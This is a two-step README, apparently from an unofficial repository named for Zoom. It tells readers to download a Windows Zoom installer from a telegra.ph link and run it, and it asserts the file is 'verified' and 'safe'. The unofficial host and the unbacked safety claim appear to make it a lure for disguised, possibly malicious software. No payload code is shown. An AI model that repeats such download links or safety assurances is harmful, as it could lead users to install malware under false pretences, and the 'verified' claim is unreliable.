mercedesbenz20i0/Zoom/README.md

 1. 🔽 **Download the App**
    Click [here](https://telegra.ph/Zoom-The-Ultimate-Online-Video-Conferencing-App-06-29) to download the latest version for your OS Windows
+🛡️ Verified file – safe and requires no extra components.
 2. 🚀 **Run the Installer**
    Double-click the downloaded file and follow the on-screen instructions.